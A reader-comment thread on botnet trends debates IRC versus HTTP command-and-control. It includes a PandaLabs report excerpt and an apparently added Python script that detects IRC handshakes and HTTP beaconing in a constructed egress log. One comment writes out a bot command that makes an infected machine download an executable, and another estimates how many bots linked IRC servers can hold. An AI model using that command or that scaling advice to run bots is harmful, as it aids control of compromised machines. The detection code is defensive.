The Sdbot and Gaobot malware families are responsible for most botnets worldwide. The two strains were responsible for 80 per cent of detections related to bots during the first quarter of 2007, Spanish anti-virus firm Panda Software reports. Other culprits, although on a lesser scale, included Oscarbot, IRCbot or RXbot. The …
Errrr. Luis Corrons needs to do his homework
OK where to start?
1. IRC controlled botnets, as seen by the Dutch herders that got busted in style last year, can control hundreds of thousands of bots. I doubt an HTTP controlled net has even got close to that; I have certainly not seen any reports of this anyway. In fact I have not even seen a stable prototype that can deal with more than a few thousand at a time. IRC servers can be installed on Windows or *nix machines then linked together. 1 Unreal server with a little modification can hold upwards of 1000 bots on an average Windows server, 4-5,000 on a good Windows server and 10,000+ on a fast *nix server; consider that when you link 20 or even 40 of these servers together you may then simultaneously control anywhere from 40,000 to 200,000 to... well, limitless.
2. Is Luis Corrons saying that with IRC controlled bots you CANNOT see when a command is executed? If not then maybe he needs to re-phrase his comments. IRC is real time, or as real time as you can get; most IRC controlled bots display a message after a command is executed such as "File Executed", "Upload Complete", "Scanning range 188.8.131.52-184.108.40.206" etc.
3. Correct, IRC is useful for controlling isolated computers; for example you may private message a command to a bot, or you may in some cases type the bot's IRC name and then the command (Sdbot1109 !download http://www.google.com/virus.exe). However you may also issue a command to an entire channel of bots where there could be many thousands, executing commands en masse! This was a completely moronic and pointless comment. Go back to bot school Mr Corrons.
There is nothing an HTTP bot can do that an IRC bot cannot.
Why is he even being quoted when he blatantly doesn't have a clue?
If this is the salvation from our bot infested misery then please help us Lord Satan.
IRC vs HTTP
Well, there is a significance to the switch to HTTP, that the author didn't hit on (which is quite surprising, actually).
The reason that the bot herders are using TCP 80 isn't necessarily about the interface or capacity of the controller server. It may play a part, but as a white hat I can't back that up with experience. What I can back up is that it is easy to block IRC on a firewall box or router.
The problem with HTTP (and the reason the hackers are using it) is that you don't have the info needed to block TCP 80 to malware while simultaneously allowing legitimate HTTP traffic. If you have a software firewall that can operate at all layers of the OSI model, then you could restrict TCP 80 outbound to just allow specific executables like your browser/mail client, without completely blocking the port, but software firewalls are not common on enterprise end systems. The only way I can think of to block that kind of traffic selectively is with a blacklist service, and we all know how annoying those can be.
IRC vs HTTP botnets
In the next PandaLabs Quarterly Report I talk about this issue:
"Zombies have usually been associated with personal computers with inadequate protection and broadband Internet connections which are permanently on. In fact, this is still largely the case as the most common infection methods can easily be blocked in corporate environments with good perimeter security policies. These bots usually receive orders via IRC, so, simply having a firewall on the network blocking this type of communications would avoid the bot-herder controlling the zombies.
Hackers however are still drawn by the prospect of controlling millions of corporate computers, due to the quantity or quality of the information they could access. However, they face two obstacles:
1.- Infecting corporate network systems.
Most big companies have security devices to try to keep their networks safe. All will have anti-malware products protecting different network levels. Consequently, the methods used by hackers to attack corporate environments must differ from those used to infect home users. What services do companies have activated? The Internet.
Solution: use web pages as a means of infection, in other words, exploit vulnerabilities so neither users nor administrators are conscious of the infection.
Antivirus protection must also be taken into account. How do they combat them? No manufacturer can guarantee 100% detection. Depending on the technologies it implements (reactive and proactive) it can reach a specific protection level, but it can never offer total protection. Furthermore, most products are only based on reactive technologies (malware detection via signature files), which, although powerful, have a significant disadvantage: they only detect previously identified malware.
Solution: modify malware to prevent signature file detections. Hackers are capable of changing Trojan variants in a few minutes. Unless you possess other types of solutions, such as behavior-based detections, you are vulnerable.
2.- Being able to control the zombies on the network.
Once systems are infected, how can bot-herders communicate with the zombies in a network which has a firewall and other security systems installed? What possible entry points do companies have? The Internet.
Solution: change the way the bot communicates, by using HTTP instead of IRC, to guarantee communication with all zombies without anyone being able to prevent it.
IRC-based bots are still the most common (the source code of some IRC bot families has been circulating on the Internet for many years), but this trend is quickly shifting towards HTTP-based bots since communication is much more effective in all environments."
I have seen many large (hundreds of thousands of zombies) HTTP controlled botnets in the last months, though there are many more IRC botnets right now.
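The two comments above make the same defensive point from different angles: a port-based egress rule stops IRC command channels cheaply, while HTTP command channels hide inside traffic that cannot simply be blocked. The script below is an added editorial example, not code from any commenter or from PandaLabs, and illustrates why the distinction matters for detection. It runs a constructed egress log through three checks: a plain port ACL (assumed here to block only TCP 6667), a content check that recognises the IRC protocol handshake on any port, and a timing check that flags HTTP requests to one host at near-constant intervals. The log format, hostnames and addresses are all made up for the example.

```python
"""Egress-log triage for IRC vs HTTP command channels (added example).

Port-based blocking catches IRC on its usual port only; the content check
catches IRC moved to another port; the beacon check is one behavioural
signal that still works when the channel is ordinary-looking HTTP.
"""
from collections import defaultdict
from statistics import mean, pstdev

# Constructed sample log: (timestamp_seconds, src_ip, dst_host, dst_port, payload_prefix)
SAMPLE_RECORDS = [
    # Classic IRC channel on the standard port: a port ACL alone stops this.
    (0,   "10.0.0.5", "irc.example.net",     6667, "NICK sdb-1109"),
    (1,   "10.0.0.5", "irc.example.net",     6667, "USER x 0 * :x"),
    (2,   "10.0.0.5", "irc.example.net",     6667, "JOIN #ctrl"),
    # IRC protocol carried over TCP 80: slips past a port-only rule.
    (5,   "10.0.0.7", "203.0.113.9",         80,   "NICK rx-22"),
    (6,   "10.0.0.7", "203.0.113.9",         80,   "JOIN #ctrl"),
    # Ordinary browsing: irregular timing, several hosts.
    (10,  "10.0.0.8", "www.example.com",     80,   "GET / HTTP/1.1"),
    (47,  "10.0.0.8", "news.example.org",    80,   "GET /index HTTP/1.1"),
    (131, "10.0.0.8", "www.example.com",     80,   "GET /img.png HTTP/1.1"),
    # HTTP check-in to one host at a fixed ~60 s interval.
    (0,   "10.0.0.9", "cmd.example-c2.test", 80,   "GET /check.php HTTP/1.1"),
    (60,  "10.0.0.9", "cmd.example-c2.test", 80,   "GET /check.php HTTP/1.1"),
    (120, "10.0.0.9", "cmd.example-c2.test", 80,   "GET /check.php HTTP/1.1"),
    (180, "10.0.0.9", "cmd.example-c2.test", 80,   "GET /check.php HTTP/1.1"),
    (241, "10.0.0.9", "cmd.example-c2.test", 80,   "GET /check.php HTTP/1.1"),
]

IRC_PORTS = {6667}  # assumption: the only port the perimeter ACL denies outbound
IRC_COMMANDS = ("NICK ", "USER ", "JOIN ", "PRIVMSG ", "PONG ")  # RFC 1459 verbs


def port_acl_blocks(dst_port):
    """What a port-only egress rule would stop."""
    return dst_port in IRC_PORTS


def looks_like_irc(payload):
    """Content check: IRC client commands are plain text at the start of a line."""
    return payload.upper().startswith(IRC_COMMANDS)


def classify(records):
    """Per source host: flows stopped by the port ACL vs. IRC seen on another port."""
    verdict = {}
    for _ts, src, _host, port, payload in records:
        v = verdict.setdefault(src, {"blocked_by_port_acl": 0, "irc_on_other_port": 0})
        if port_acl_blocks(port):
            v["blocked_by_port_acl"] += 1
        elif looks_like_irc(payload):
            v["irc_on_other_port"] += 1
    return verdict


def detect_beacons(records, min_hits=4, max_cv=0.1):
    """Flag (src, host) pairs whose HTTP request gaps are nearly constant.

    Returns a list of (src, host, mean_gap_seconds). The coefficient of
    variation (stdev / mean) of the inter-request gaps is compared with
    max_cv; human browsing produces far more jitter than a fixed timer.
    """
    times = defaultdict(list)
    for ts, src, host, port, payload in records:
        if port == 80 and payload.startswith(("GET ", "POST ")):
            times[(src, host)].append(ts)
    flagged = []
    for (src, host), ts_list in times.items():
        if len(ts_list) < min_hits:
            continue
        ts_list.sort()
        gaps = [b - a for a, b in zip(ts_list, ts_list[1:])]
        avg = mean(gaps)
        if avg > 0 and pstdev(gaps) / avg <= max_cv:
            flagged.append((src, host, avg))
    return flagged


if __name__ == "__main__":
    for src, counts in classify(SAMPLE_RECORDS).items():
        print(src, counts)
    for src, host, gap in detect_beacons(SAMPLE_RECORDS):
        print(f"beacon candidate: {src} -> {host} every ~{gap:.0f}s")
```

Run against the constructed log, the port ACL accounts for all of 10.0.0.5's traffic but nothing from 10.0.0.7, whose IRC handshake on port 80 only surfaces through the content check; the HTTP check-in from 10.0.0.9 is invisible to both and is caught only by its timing. The thresholds (four hits, 10% jitter) are illustrative and would need tuning against real proxy logs to keep software update checks and similar legitimate timers out of the results.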